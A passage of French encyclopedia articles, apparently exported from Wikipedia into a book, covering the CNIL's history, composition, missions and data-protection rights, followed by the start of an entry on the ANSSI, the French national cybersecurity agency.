Liste électronique L'OSSIR assure la gestion et l'animation de listes électroniques : •• une liste par groupe de travail réservée aux informations relatives au groupe ; •• une liste réservée aux annonces des différents événements et manifestations concernant la sécurité ; •• une liste de discussion modérée sur la sécurité.

Notes et références

[1] JSSI (http:/ / www. ossir. org/ jssi/ index. shtml)

[2] Lire les conditions générales du sponsoring (http:/ / www. ossir. org/ association/ sponsoring. shtml)

Lien externe

• Site officiel (http:/ / www. ossir. org/ )

• Portail des associations • Portail de la sécurité informatique • Portail de la sécurité de l’information Commission nationale de l'informatique et des libertés 326 Commission nationale de l'informatique et des libertés

Commission nationale de l'informatique et des libertés

Devise : « L'informatique doit respecter l'identité humaine, les droits de l'homme, la vie privée et les libertés. »

Région France

Création 6 janvier 1978

Type Autorité administrative indépendante

Siège Paris, Île-de-France

Coordonnées [1] [1] 48° 52′ 03″ N 2° 20′ 20″ E 48° 52′ 03″ N 2° 20′ 20″ E Membre(s) 17 membres

Président [2] Isabelle Falque-Pierrotin

Site web http:/ / www. cnil. fr/

Géolocalisation sur la carte : Paris

[3] modifier

La Commission nationale de l'informatique et des libertés (CNIL) est une autorité administrative indépendante française. La CNIL est chargée de veiller à ce que l’informatique soit au service du citoyen et qu’elle ne porte atteinte ni à l’identité humaine, ni aux droits de l’homme, ni à la vie privée, ni aux libertés individuelles ou publiques. Elle exerce ses missions conformément à la loi n°78-17 du 6 janvier 1978 modifiée le 6 août 2004.

Historique et contexte Le 21 mars 1974, la révélation par le quotidien Le Monde[4] d'un projet gouvernemental tendant à identifier chaque citoyen par un numéro et d'interconnecter, via ce numéro, tous les fichiers de l'administration créa une vive émotion dans l'opinion publique. Ce projet, connu sous le nom de SAFARI (Système automatisé pour les fichiers administratifs et le répertoire des individus), visait à interconnecter les fichiers nominatifs de l'administration française, notamment par le biais du numéro Insee. Il soulignait les dangers de certaines utilisations de l'informatique et faisait craindre un fichage général de la population. Cette inquiétude a conduit le gouvernement à créer une commission afin qu'elle propose des mesures garantissant que le développement de l'informatique se réalise dans le respect de la vie privée, des libertés individuelles et publiques. Commission nationale de l'informatique et des libertés 327

Cette « Commission Informatique et Libertés » proposa, après de larges consultations et débats, de créer une autorité indépendante. C’est ce que fit la loi du 6 janvier 1978 en instituant la Commission nationale de l’informatique et des libertés.

Loi de 1978 et modification en 2004 Article détaillé : Loi relative à l'informatique, aux fichiers et aux libertés du 6 janvier 1978. La loi relative à l'informatique, aux fichiers et aux libertés du 6 janvier 1978 constitue le fondement de la protection des données à caractère personnel dans les traitements informatiques mis en œuvre sur le territoire français. Elle a été réformée par la loi du 6 août 2004, qui transposait, de façon libre, la directive européenne du 24 octobre 1995 sur la protection des données à caractère personnel (dir. 95/46/CE). La loi de 2004 allège de façon substantielle les obligations déclaratives des détenteurs de fichiers, accroît les pouvoirs de la CNIL en ce qui concerne les contrôles sur place et les sanctions, et renforce les droits des personnes[5]. Elle a également créé les « Correspondants Informatique et Libertés » (CIL). Il s’agit de professionnels, qui au sein de leur organisme (entreprise, administration ou collectivité locale), veillent au respect de la loi Informatique et Libertés.

Projet de règlement européen Le 25 janvier 2012, la Commission européenne a adopté un projet de règlement européen et de directive réformant le cadre de la protection des données. Le règlement devrait entrer en vigueur dans les deux ans à compter de sa publication après adoption par le Conseil et le Parlement européens dans chaque pays membre de l'Union, c'est-à-dire en pratique sans doute pas avant l'année 2016. En mars 2012, le Groupe de Travail G29 a adopté un avis sur les propositions de réforme présentées par la Commission Européenne. Il se félicite du renforcement des droits des individus, des pouvoirs des autorités de contrôle et des responsabilités des responsables de traitements et sous-traitants. Toutefois, en dépit de ces avancées positives, le G29, comme la CNIL, estiment que le projet de règlement nécessite des éclaircissements et des améliorations [6].

Statut et composition

Collège de 17 membres La commission se compose d’un collège pluraliste de 17 personnalités nommées pour 5 ans renouvelable une fois : • 4 parlementaires (2 députés et 2 sénateurs) ; • 2 membres du Conseil économique, social et environnemental ; • 6 représentants des hautes juridictions (2 conseillers d’État, 2 conseillers à la Cour de cassation, 2 conseillers maîtres à la Cour des comptes) ; • 5 personnalités qualifiées : 3 désignées par décret, 1 par le Président de l’Assemblée nationale et 1 par le Président du Sénat.

Autorité administrative indépendante 12 des 17 membres sont élus ou désignés par les assemblées ou les juridictions auxquelles ils appartiennent. La CNIL élit son Président parmi ses membres. Depuis le 1er septembre 2012 et l’adoption des lois organiques et ordinaires relatives au Défenseur des droits, la fonction de Président de la CNIL est devenue incompatible avec toute activité professionnelle, tout mandat électif national, tout autre emploi public et toute détention, directe ou indirecte, d'intérêts dans une entreprise du secteur des communications électroniques ou de l'informatique. La fonction de Président est désormais un emploi à plein temps. La CNIL ne reçoit d’instruction d’aucune autorité. Les ministres, autorités publiques, dirigeants d’entreprises, publiques ou privées, ne peuvent s’opposer à son action. Commission nationale de l'informatique et des libertés 328

Les décisions de la CNIL, qui prennent le nom de délibération, peuvent faire l’objet de recours devant le Conseil d'Etat.

Budget et moyens Le budget de la CNIL relève du budget de l’État. Le Président de la CNIL recrute librement ses collaborateurs, qui ont le statut d'agent contractuel.

En 2011 • le budget de la CNIL était de 15,8 millions d’Euros. • la CNIL comptait 159 collaborateurs. Les dépenses de personnel représentaient 10,3 millions d’Euros.

Présidents de la CNIL

Présidents de la CNIL Début du mandat Fin du mandat

Pierre Bellet 5 décembre 1978 27 novembre 1979

Jacques Thyraud 27 novembre1979 décembre1983

Jean Rosenwald décembre 1983 Juin 1984

Jacques Fauvet 14 juin 1984 décembre 1999

Michel Gentot 3 février 1999 7 janvier 2004

Alex Türk 3 février 2004 21 septembre 2011

[2] Isabelle Falque-Pierrotin 21 septembre 2011

Son fonctionnement

Séances plénières et formation restreinte Les membres de la CNIL se réunissent en séances plénières quasiment une fois par semaine sur un ordre du jour établi à l’initiative de son Président. Une partie importante de ces séances est consacrée à l’examen de projets de loi et de décrets soumis à la CNIL pour avis par le Gouvernement. La CNIL autorise également la mise en œuvre de fichiers les plus sensibles, parmi lesquels ceux faisant appel à la biométrie. Depuis la loi du 6 août 2004, la commission se réunit en "formation restreinte", qui est la formation contentieuse de la commission. Composée de six membres, elle peut prononcer des sanctions allant de l’avertissement à une amende maximale de 300 000 €, à l’encontre des responsables de traitement ne respectant pas la loi. Le 31 mars 2011, les lois organiques et ordinaires relative au Défenseur des droits ont modifié l’organisation de la formation restreinte. L’article 13 de la loi du 6 janvier 1978 modifiée en août 2004 a ainsi été modifié pour prévoir que le Président et les deux Vice-Présidents de la Commission (lesquels composent son bureau) ne sont plus éligibles à la formation restreinte de la CNIL. Celle-ci est composée d’un président distinct de celui de la formation plénière et de cinq autres membres élus par les 17 membres du Collège. Cette réforme donne aussi une plus grande liberté de publicité des décisions de la CNIL : le bureau peut désormais, sur demande du Président, décider de la publicité des mises en demeure, et la formation restreinte dispose, elle, d’une plus grande liberté pour la publication des sanctions. Commission nationale de l'informatique et des libertés 329

Activités hors séances plénières Seuls, les dossiers nécessitant une décision ou une prise de position du collège des commissaires sont évoqués lors des séances plénières. En dehors des séances, les commissaires sont chargés de suivre plus particulièrement les secteurs qui leur sont attribués par le Président en liaison avec les services. Les commissaires peuvent être chargés de représenter la CNIL dans diverses réunions ou instances, et participer à des missions de contrôle. Les commissaires ayant la qualité de magistrats ou d'anciens magistrats sont seuls habilités à avoir accès aux fichiers de police pour le compte des citoyens concernés (droit d'accès indirect). La CNIL, dont les moyens ont plus que doublé depuis l'an 2000, dispose de 159 postes budgétaires. Pour remplir ses missions, le président de la CNIL, assisté d'un secrétaire général, s’appuie sur différents services organisés au sein de quatre directions : une direction des affaires juridiques, internationales et de l’expertise, une direction des relations avec les usagers et du contrôle, une direction des ressources humaines, financières, informatiques et logistiques, et une direction des études, de l’innovation et de la prospective, créée en 2011. Dans l’exercice de ses missions, la CNIL répond aux demandes de conseils qui lui sont adressées par des responsables de traitements, instruit les plaintes dont elle est saisie par les citoyens, organise des contrôles sur place. Elle procède également aux vérifications nécessaires dans le cadre du droit d’accès indirect aux fichiers intéressant la sécurité publique et la sûreté de l’État, et délivre à toute personne qui en fait la demande un extrait de la liste des traitements qui lui sont déclarés (« fichier des fichiers »). Au-delà de ses activités de recensement, de contrôle des fichiers, des réponses faites aux demandes de conseil et de l’instruction des plaintes, la CNIL consacre une partie de son activité à l’information des personnes sur leurs droits et sur leurs obligations. Directement sollicitée par de nombreux organismes ou institutions pour conduire des actions de formation et de sensibilisation à la loi “informatique et libertés”, la CNIL participe à des colloques, des salons ou des conférences pour informer. La CNIL a déjà organisé 21 rencontres régionales Il s’agit d’aller périodiquement à la rencontre de l’ensemble des acteurs publics ou privés concernés par la protection des données personnelles, dans une région à l’instar des entreprises et des administrations déconcentrées de l’État. Pour donner plus d’écho à ses décisions ou à ses actions, la CNIL dispose de différents outils de communication : site internet, lettre mensuelle électronique adressée à 36 661 abonnés, rapport annuel, communiqués de presse ainsi qu’une collection de guides pratiques.

Missions

Six missions principales Informer La CNIL est investie d’une mission générale d’information des personnes sur leurs droits et leurs obligations. Elle aide les citoyens dans l'exercice de leurs droits. Elle établit chaque année un rapport public rendant compte de l'exécution de sa mission Réguler La CNIL régule et recense les fichiers, autorise les traitements les plus sensibles avant leur mise en place. L'avis de la CNIL doit d’ailleurs être sollicité avant toute transmission au Parlement d'un projet de loi relatif à la protection des données personnelles ; il doit aussi être sollicité par le Gouvernement avant d'autoriser les traitements intéressant la sûreté de l'État, la défense ou la sécurité publique. La CNIL établit des normes simplifiées, afin que les traitements les plus courants fassent l'objet de formalités allégées. Elle peut aussi décider de dispenser de toute déclaration des catégories de traitement sans risque pour les libertés individuelles. Elle agit également par voie de recommandations. Depuis 2004, la CNIL a la possibilité de délivrer des labels à des produits ou à des procédures ayant trait à la protection des personnes à l'égard du traitement des données à caractère personnel. Elle a procédé en 2012 à ses premières délivrances de labels Commission nationale de l'informatique et des libertés 330

dans les secteurs de la formation et de la procédure d'audit. Protéger La CNIL doit veiller à ce que les citoyens soient informés des données contenues dans les traitements les concernant et qu'ils puissent y accéder facilement. Elle reçoit et instruit les plaintes des personnes qui rencontrent des difficultés à exercer leurs droits. Elle exerce, pour le compte des citoyens qui le souhaitent, l'accès aux fichiers intéressant la sûreté de l'État, la défense et la sécurité publique, notamment des services de renseignements et de la police judiciaire. Contrôler La CNIL vérifie que la loi est respectée en contrôlant les traitements informatiques. Elle peut de sa propre initiative se rendre dans tout local professionnel et vérifier sur place et sur pièce les fichiers. La Commission use de ses pouvoirs d’investigation pour instruire les plaintes et disposer d'une meilleure connaissance de certains fichiers. La CNIL surveille par ailleurs la sécurité des systèmes d'information en s'assurant que toutes les précautions sont prises pour empêcher que les données ne soient déformées ou communiquées à des personnes non-autorisées. Sanctionner Lorsqu'elle constate un manquement à la loi, la CNIL peut, après avoir mis en demeure les intéressés de mettre fin à ce manquement, prononcer diverses sanctions : l’avertissement, les sanctions pécuniaires pouvant atteindre 300 000 €, l’injonction de cesser le traitement. Enfin, le Président peut demander en référé à la juridiction compétente d'ordonner toute mesure de sécurité nécessaire. Il peut saisir également le Procureur de la République des violations de la loi dont il a connaissance. • Le 6 novembre 2009, le Conseil d'État a annulé deux sanctions prononcées en 2006 par la CNIL à l’encontre de sociétés effectuant de la prospection commerciale par téléphone. Ces entreprises ayant exercé un recours contre ces sanctions devant le Conseil d'Etat, ce dernier a estimé que les contrôles doivent être « préalablement autorisés par un juge », à moins que le responsable de l'entreprise ait été « préalablement informée de son droit de s'opposer » au contrôle[7]. Anticiper La CNIL doit s'attacher à comprendre et anticiper les développements des technologies de l'information afin d'être en mesure d'apprécier les conséquences qui en résultent pour l'exercice des droits et libertés. Elle propose au Gouvernement les mesures législatives ou réglementaires de nature à adapter la protection des libertés et de la vie privée à l'évolution des techniques. Pour renforcer sa capacité d'anticipation, elle s'est dotée en 2012 d'un comité de la prospective rassemblant des experts extérieurs. Une direction des études, de l’innovation et de la prospective (DEIP) avait été préalablement mise en place en 2011 pour développer la réflexion prospective au sein de la CNIL.

Droits « informatique et libertés » Droit d’information Toute personne peut s’adresser directement à un organisme pour savoir si elle est fichée ou pas. Droit d’accès Sauf pour les fichiers relevant du droit d'accès indirect, toute personne peut, gratuitement, sur simple demande avoir accès à l’intégralité des informations la concernant sous une forme accessible (les codes doivent être explicités). Elle peut également en obtenir copie moyennant le paiement, le cas échéant, des frais de reproduction. Droit de rectification et de radiation Commission nationale de l'informatique et des libertés 331

Toute personne peut demander directement que les informations détenues sur elle soient rectifiées (si elles sont inexactes), complétées ou clarifiées (si elles sont incomplètes ou équivoques), mises à jour (si elles sont périmées) ou effacées (si ces informations ne pouvaient pas être régulièrement collectées par l’organisme concerné). Droit d’opposition Toute personne peut s’opposer à ce qu’il soit fait un usage des informations la concernant à des fins publicitaires ou de prospection commerciale ou que ces informations la concernant soient cédées à des tiers à de telles fins. La personne concernée doit être mise en mesure d’exercer son droit d’opposition à la cession de ses données à des tiers dès leur collecte. L’utilisation d’automates d’appels téléphoniques, de fax ou de messages électroniques à des fins publicitaires est interdite si les personnes n’y ont pas préalablement consenti. Droit d’accès indirect Toute personne peut demander à la CNIL de vérifier les informations la concernant éventuellement enregistrées dans des fichiers intéressant la sûreté de l’ État, la défense ou la sécurité publique (droit d’accès indirect). La CNIL mandate l’un de ses membres magistrats (ou anciens magistrats) afin de vérifier la pertinence, l’exactitude et la mise à jour de ces informations et demander leur rectification ou leur suppression. Avec l’accord du responsable du traitement, les informations concernant une personne peuvent lui être communiquées.

Obligations des responsables du traitement •• Notifier la mise en œuvre du fichier et ses caractéristiques à la CNIL, sauf cas de dispense prévus par la loi ou par la CNIL. • Mettre les personnes concernées en mesure d’exercer leurs droits en les en informant. • Assurer la sécurité et la confidentialité des informations afin qu’elles ne soient pas déformées ou communiquées à des tiers non autorisés. • Se soumettre aux contrôles et vérifications sur place de la CNIL et répondre à toute demande de renseignements qu’elle formule dans le cadre de ses missions.

La CNIL en chiffres La CNIL en 2011 : •• 385 contrôles •• 65 mises en demeure •• 19 sanctions •• 5737 plaintes reçues •• 2099 demandes de droit d'accès indirect (fichiers de police et de gendarmerie) •• 32743 courriers entrants numérisés •• 82 243 déclarations •• 11 600 appels/mois Commission nationale de l'informatique et des libertés 332

Protection des données personnelles sur le plan international Articles détaillés : Vie privée et Données personnelles. L'Allemagne en 1971, la Suède en 1973 et la France en 1978 ont été les trois premiers pays dotés d'une loi informatique et libertés. Ces lois instituent la création d'autorités de contrôle indépendantes. Certaines structures économiques et politiques internationales s'en sont inspirées, parmi lesquelles l'Organisation de coopération et de développement économiques (OCDE) en 1980, le Conseil de l'Europe en 1981 (Convention pour la protection des personnes à l’égard du traitement automatisé des données à caractère personnel) et les Nations unies (ONU) en 1990. En 1995, la Communauté européenne a émis une directive en ce sens, que les pays de l'Union européenne doivent transposer. Depuis le 28 janvier 2007, une Journée européenne de la protection des données à caractère personnel est organisée par le Conseil de l'Europe et relayée en France par la CNIL [8].

Au niveau européen L’Union européenne a adopté le 24 octobre 1995 une directive destinée à harmoniser au sein des États membres la protection assurée à toute personne quel que soit le lieu où sont opérés les traitements de ses données à caractère personnel. À ce jour, les 27 États membres ainsi que les pays de l’Espace Économique Européen (Islande, Liechtenstein, Norvège), disposent d’une loi « informatique et libertés » et d’une autorité de contrôle indépendante.

Groupe de l'article G29 L’article 29 de la directive du 24 octobre 1995 sur la protection des données et la libre circulation de celles-ci a institué un groupe de travail de ces 27 « CNIL européennes ». C’est le « groupe de l’article 29 » (G29), par référence à l’article qui l’institue. Il a pour mission de contribuer à l’élaboration des normes européennes en adoptant des recommandations, de rendre des avis sur le niveau de protection dans les pays tiers et de conseiller la Commission européenne sur tout projet ayant une incidence sur les droits et libertés des personnes physiques à l’égard des traitements de données personnelles. Le G29 se réunit à Bruxelles en séance plénière tous les deux mois environ. Environ 15 sous-groupes composés des collaborateurs des « CNIL européennes » se réunissent régulièrement à Bruxelles pour alimenter les réflexions des membres du G29 en séance plénière et rédiger les avis qui leur seront ensuite soumis pour adoption. Depuis le 15 février 2010, le nouveau président du G29 est le Néerlandais Jacob Kohnstamm (nl)[9].

Administrations équivalentes dans d'autres pays D’autre pays européens non membres de l’Union ont adopté des lois et des garanties similaires à celles reconnues par les États membres tels que la Croatie, la Macédoine, les îles anglo-normandes, Monaco, Gibraltar et la Suisse. Au-delà de l’Europe, des pays tels que le Canada, l’Argentine, l’Australie, la Nouvelle-Zélande, la Corée du Sud, le Maroc, le Burkina Faso et le Sénégal se sont également dotés d’une loi et d’une autorité indépendante de contrôle. D’autres États ont fait le choix d’adopter une législation de garanties, quelquefois limitée au seul secteur public ou à certaines activités du secteur privé, sans toujours instituer une autorité indépendante de contrôle dotée de larges pouvoirs ; il revient alors aux juridictions judiciaires de sanctionner la méconnaissance des droits reconnus. Tel est le cas pour les États-Unis, le Japon, le Paraguay, Taïwan, et la Thaïlande. Commission nationale de l'informatique et des libertés 333

Transfert de données La Directive européenne du 24 octobre 1995, reconnaît le principe selon lequel les données personnelles ne peuvent être transmises hors de l’Union européenne que si l’entreprise destinataire des données ou le pays de destination offre un niveau de protection “adéquat”. C'est le cas du Canada, de la Suisse, de l'Argentine, des territoires de Guernesey, de Jersey et de l'île de Man . Les échanges avec d’autres pays sont possibles seulement: •• Si des Clauses Contractuelles Types, approuvées par la Commission européenne, sont signées entre deux entreprises ou, •• Si des Règles internes d'entreprises ou Binding Corporate Rules (BCR) sont adoptées au sein d'un groupe ou, •• Si dans le cas d'un transfert vers les États-Unis, l'entreprise destinataire a adhéré au Safe Harbor ou, • Si l'une des exceptions prévues par l’article 69 de la loi Informatique et Libertés est invoquée La CNIL participe à la conférence mondiale et à la conférence francophone des autorités de protection des données. Elle assure le secrétariat général de l’association des autorités francophones[10].

Exemples d'interventions de la CNIL La CNIL est par exemple intervenue sur les cas suivants : Faits trop anciens Monsieur C., 24 ans, mécanicien aéronautique, a souhaité exercer son droit d’accès indirect aux fichiers de police judiciaire, à la suite de la décision de refus de délivrance de son badge aéroportuaire, indispensable à l’exercice de sa profession. Les vérifications effectuées par la CNIL, ont conduit à la suppression de son signalement dans le STIC pour une affaire de "vol simple" dont le délai de conservation, fixé à 5 ans, était expiré. Absence de mise à jour Monsieur P. 35 ans, a sollicité la délivrance d’une carte professionnelle pour exercer dans la sécurité privée. Il a parallèlement saisi la CNIL d’une demande de droit d’accès indirect aux fichiers de police judiciaire. Au terme des vérifications, deux affaires de nature contraventionnelle ont été supprimées du STIC et les deux restantes ont fait l’objet d’une mise à jour par mention des décisions de classement sans suite pour « carence du plaignant » et « préjudice peu important » dont il avait bénéficié. Monsieur P. qui, malgré ces inscriptions, a pu obtenir sa carte professionnelle ne devrait, dès lors, pas avoir de difficultés à obtenir son renouvellement à l’avenir car il est désormais inconnu administrativement de ce fichier.

Mesure injustifiée • Une personne, fichée à tort, s'était vu écartée d'une candidature pour travailler sur le tarmac de l'aéroport de Roissy-Charles-de-Gaulle. Le temps de corriger les données, l'emploi a été attribué à une autre personne[11]. • Monsieur G., 57 ans, commandant de bord depuis plus de vingt ans au sein d’une compagnie aérienne, a été confronté à des difficultés de renouvellement de son badge aéroportuaire. Si ce badge lui a finalement été délivré avec retard, sa validité a été limitée à 1 an au lieu de 3 ans. N’ayant pu obtenir de plus amples explications, Monsieur G. a souhaité exercer son droit d’accès indirect afin de déceler l’origine de ses difficultés. Les vérifications menées par la CNIL ont conduit à la suppression de son enregistrement dans le fichier JUDEX pour une affaire de « travail clandestin, abus de biens sociaux et escroquerie » dans laquelle il n’était pas mis en cause. Monsieur G était juste cité dans la procédure mais ni en tant que mis en cause ni en tant que victime. Lors de l’intégration du compte rendu d’enquêtes dans JUDEX, il y a été intégré à tort comme l’auteur de ces faits ce qui a été à l’origine de ses difficultés. Commission nationale de l'informatique et des libertés 334

Limites de la loi La loi ne prévoit qu'une obligation de mesures techniques et d'organisation, ce qui pourrait s'interpréter comme une obligation de moyens, ainsi le sous-traitant qui rend public des données personnelles ne serait pas fautif, si sa relation contractuelle (conforme à la loi) était interprétée comme dénuée d'obligation de résultat. Dès lors, le pouvoir de contrôle de la Cnil s'en trouve limité[12]. Les fichiers informatiques ne sont soumis qu'à une obligation de déclaration, dès lors les contrôles de la Cnil n'ont lieu qu'a posteriori, une fois que l'infraction est commise ou que le fichier à caractère personnel est rendu public.

La CNIL remise en cause Le 14 décembre 2007 les locaux de la CNIL ont été occupés une matinée par plusieurs dizaines de personnes qui ont notamment déployé une banderole « Informatique ou libertés, il faut choisir »[13],[14]. Le collectif Pièces et Main d'Œuvre avance, dans un texte d'avril 2007, que la CNIL ne bénéficie que d'une « pseudo-indépendance » et rappelle que « depuis juillet 2004, la loi a décidé que les services de police n'auraient même plus à s'asseoir sur les avis de la CNIL pour créer de nouveaux fichiers. Celle-ci était inaudible et silencieuse, la voici muette. Rien qu'un guichet de police. »[15],[16]

Notes et références

[1] http:/ / tools. wmflabs. org/ geohack/ geohack. php?pagename=Commission_nationale_de_l%27informatique_et_des_libert%C3%A9s&

language=fr& params=48. 8676296_N_2. 3389292_E_type:landmark

[2] Mme Isabelle Falque-Pierrotin est élue Présidente de la CNIL (http:/ / www. cnil. fr/ la-cnil/ actu-cnil/ article/ article/

mme-isabelle-falque-pierrotin-est-elue-presidente-de-la-cnil/ ), sur le site cnil.fr

[3] http:/ / fr. wikipedia. org/ w/ index. php?title=Commission_nationale_de_l%27informatique_et_des_libert%C3%A9s& action=edit& section=0

[4] "Safari" ou la chasse au français (http:/ / rewriting. net/ wp-content/ le_monde_-_21_03_1974_009-3. jpg), Le Monde du 21 mars 1974

[5] Texte Fondateurs (http:/ / www. cnil. fr/ en-savoir-plus/ textes-fondateurs), sur le site de la Cnil

[6] Le G29 adopte un avis sur le projet de règlement européen réformant le cadre général sur la protection des données (http:/ / www. cnil. fr/

la-cnil/ actualite/ article/ article/ le-g29-adopte-un-avis-sur-le-projet-de-reglement-europeen-reformant-le-cadre-general-sur-la-pro/ ), sur le site de la Cnil

[9] Jacob KOHNSTAMM, Chairman of CBP (http:/ / ec. europa. eu/ justice/ policies/ privacy/ workinggroup/ members_en. htm), sur le site ec.europa.eu

[10] Site de l'association francophone des autorités de protection des données personnelles (AFAPDP) (http:/ / www. afapdp. org) [11] Ouest-France, 15 juillet 2008, page 5. Faits rapportés par Alex Türk, président de la CNIL.

[12] Enquête : des données médicales confidentielles accessibles sur le web (http:/ / www. actusoins. com/ 12771/

des-donnees-medicales-confidentielles-accessibles-sur-le-web. html), Thomas Duvernoy et Leila Minano, Actu Soins, 4 février 2013

[13] « La Cnil occupée par des manifestants » (http:/ / www. theinquirer. fr/ 2007/ 12/ 14/ la_cnil_occupee_par_des_manifestants. html), The Inquirer, 14 décembre 2007.

[14] « La CNIL occupée par une centaine de personnes » (http:/ / tempsreel. nouvelobs. com/ actualites/ medias/ 20071214. OBS0316/

la_cnil_occupee_par_une_centaine_de_personnes. html?idfx=RSS_notr), tempsreel.nouvelobs.com, 13 février 2008.

[15] « L’invention du « sécuritaire » ou la liquidation de la gauche militante » (http:/ / www. piecesetmaindoeuvre. com/ spip. php?article105), Pièces et Main d'Œuvre, 20 avril 2007

[16] Version pdf (http:/ / www. piecesetmaindoeuvre. com/ IMG/ pdf/ Securite. pdf), sur le site piecesetmaindoeuvre.com Agence nationale de la sécurité des systèmes d'information 335 Agence nationale de la sécurité des systèmes d'information

Cet article possède un paronyme ; voir : ANSI.

ANSSI

Création 7 juillet 2009

Type Service à compétence nationale chargé de la sécurité informatique

Siège 51 boulevard de La Tour-Maubourg 75007 Paris

Budget 75 millions d'euros

Effectifs 250 (2012) et > 350 (fin 2013)

Directeur général Patrick Pailloux

Affiliation(s) Secrétaire général de la défense et de la sécurité nationale

Site web [1] ssi.gouv.fr

[2] modifier

L'Agence nationale de la sécurité des systèmes d'information (ANSSI) est un service français créé par décret le 7 juillet 2009[3]. Ce service à compétence nationale est rattaché au Secrétaire général de la défense et de la sécurité nationale (SGDSN), autorité chargée d'assister le Premier ministre dans l'exercice de ses responsabilités en matière de défense et de sécurité nationale. L'ANSSI remplace la Direction centrale de la sécurité des systèmes d'information, créée par le décret du 31 juillet 2001 (art. 10 du décret du 7 juillet 2009). L’arrêté du Premier ministre en date du 9 juillet 2009 nomme Patrick Pailloux, ingénieur général des mines, directeur général de l’ANSSI. Son budget s'élève à 75 millions d'euros et ses effectifs à 250 personnes en 2012[4]. Sur le site officiel de l'ANSSI, il est en outre précisé que pour faire face aux multiples menaces informatiques auxquelles la France est désormais exposée, les effectifs de cette agence seront de nouveau accrus d'une centaine de personnes en 2013, pour atteindre et même dépasser les 350 agents en fin d'année 2013. En guise de comparaison, les services homologues à l'ANSSI en Allemagne et au Royaume-Uni comptent entre 500 et 700 personnes.

Historique et Contexte L’ANSSI est l’héritière d’une longue série d’organismes chargés d’assurer la sécurité des informations sensible de l’État[5] : • 1943 : la Direction technique du chiffre (créée à Alger) •• 1951 : le service central technique du chiffre (à Paris) •• 1977 : le service central du chiffre et de la sécurité des télécommunications • 1986 : le service central de la sécurité des systèmes d’information • 2001 : la direction centrale de la sécurité des systèmes d’information. Ces organismes, au départ créés dans une optique militaire de sécurité des informations et de protection de données confidentielles ont peu à peu évolué. En 1986, le service central du chiffre et de la sécurité des télécommunications a été remplacé par le service central de la sécurité des systèmes d’information. Aujourd’hui, l’ANSSI a toujours une mission de défense des systèmes d’information de l’État mais elle est aussi chargée d’une mission de conseil et de soutien aux administrations et aux opérateurs d’importance vitale. Agence nationale de la sécurité des systèmes d'information 336

Missions L’agence est organisée en quatre sous-directions et un centre de formation qui reflètent ses principales missions : 1. le centre opérationnel de la sécurité des systèmes d'information (COSSI) qui participe à la Cyberdéfense 2.2.Relations extérieures et coordination (Relec) 3.3.Expertise (SDE) 4. Développement des systèmes d’information sécurisés (SIS) 5.5.Centre de formation à la sécurité des systèmes d'information (CFSSI).

Cyberdéfense Le centre opérationnel de la sécurité des systèmes d'information (COSSI) assure un service permanent de veille, de détection et d’alerte en cas d’incidents ou de vulnérabilités susceptibles d’affecter la sécurité des systèmes d’information de l’État et plus largement de la société de l’information. Il coordonne la réaction à ces incidents. Il est chargé de la planification des mesures de réponse aux attaques informatiques et conduit des exercices afin de mesurer le degré de préparation de l’État et d’entraîner les personnels concernés.

Relations extérieures et coordination L’agence coordonne la mise en œuvre de la fonction d’autorité nationale dans le domaine de la sécurité des systèmes d’information. À ce titre elle est chargée de : • la gouvernance, la préparation de la stratégie nationale, l’animation interministérielle ; •• la préparation des textes réglementaires ; • la labellisation de produits et de services ; • l’organisation et le suivi des relations internationales et industrielles ; • l’instruction des dossiers de déclaration et d’autorisation relatifs aux produits réglementés.

Sous-direction Expertise L’agence apporte son concours aux administrations et aux opérateurs d’importance vitale pour la sécurisation de leurs systèmes d’information. •• Elle est également chargée de définir les recommandations générales, les référentiels techniques et les guides méthodologiques. • Elle dispose de laboratoires techniques de haut niveau, aptes à anticiper les évolutions technologiques et à les sécuriser (cryptologie, réseaux, composants, signaux...). • Elle dispose d’une capacité d’audit pour évaluer la sécurité des systèmes d’information des services de l’État. Cette capacité peut également être utilisée dans le cadre du contrôle qu’exerce l’État sur les opérateurs d’importance vitale. •• Elle vient renforcer la capacité de gestion de crise en cas de besoin. Agence nationale de la sécurité des systèmes d'information 337

Développement des systèmes d’information sécurisés (SIS) L’agence est chargée de la conception, de la réalisation et des évolutions de systèmes d’information sécurisés et de produits de sécurité. Elle veille notamment à la mise à disposition de moyens sécurisés de communication électronique, disponibles en toutes circonstances pour les plus hautes autorités gouvernementales, ainsi que pour les autorités publiques et les organismes associés à la gestion des situations d’urgence et des crises.

Formation L’agence dispose d’un centre de formation à la sécurité des systèmes d’information (CFSSI). Ce dernier dispense des enseignements spécialisés qui vont de la sensibilisation à la formation d’experts en cryptologie ou en systèmes. Il dispense la formation d’expert en sécurité des systèmes d’information (ESSI), sanctionnée par un titre de niveau I (Bac +5). Chaque année, il forme plus de 1500 agents publics. On notera le développement de ce type d’organisation dans de nombreux autres pays comme aux États-Unis avec le Department of Homeland Security (DHS) et la NSA (National Security Agency) ou la C.S.S. (Central Security Service). Voici un tableau comparatif des missions de l’ANSSI et de la NSA :

ANSSI NSA

Réglementation, développement de système d’information Le renseignement d’origine électromagnétique comprenant la surveillance des sécurisé. communications électroniques (voir programme Echelon).

Conseils et expertises aux entreprises et administrations. Empêcher l’accès aux informations d’Etat

Mission de veille de la sécurité des systèmes d’information de La sécurité des systèmes de communications et de traitement des données. l’État et plus largement de la société de l’information.

Organisation

Direction La direction de l’ANSSI est assurée par un directeur général (actuellement Patrick Pailloux), nommé par le Premier ministre sur décret. Il est assisté d’un directeur général adjoint et d’un chef de cabinet. Les missions de l'ANSSI sont confiées à 4 sous-directions :ervice central de la sécurité des systèmes d’information • le Centre opérationnel de la sécurité des systèmes d'information (COSSI) qui assure la mise en œuvre de la fonction d’autorité de défense des systèmes d’information dévolue à l’ANSSI. • la sous-direction Expertise (SDE[6]) qui porte la mission globale d’expertise et d’assistance technique de l’agence. Elle apporte son soutien à l’ensemble des autres sous-directions de l’ANSSI, aux ministères, aux industriels et prestataires de la sécurité et aux opérateurs d’importance vitale. • la sous-direction Systèmes d'information sécurisés (SIS[7]) qui porte la mission de proposer, concevoir et mettre en œuvre des produits et des systèmes d’information sécurisés au profit des ministères, des opérateurs d’importance vitale et de l’ANSSI. • la sous-direction Relations extérieures et coordination (RELEC[8]) qui anime, de manière transverse, les relations extérieures de l’agence, la coordination des interventions et l’élaboration de la réglementation. L'ANSSI dispose également de son propre centre de formation, le Centre de formation en sécurité des systèmes d'information (CFSSI[9]), délivrant notamment un diplôme d'expert en sécurité des systèmes d'information (ESSI) reconnu comme titre de niveau 1 (voir Liste des diplômes en France) et enregistré au Répertoire national des certifications professionnelles (RNCP, voir CNCP). 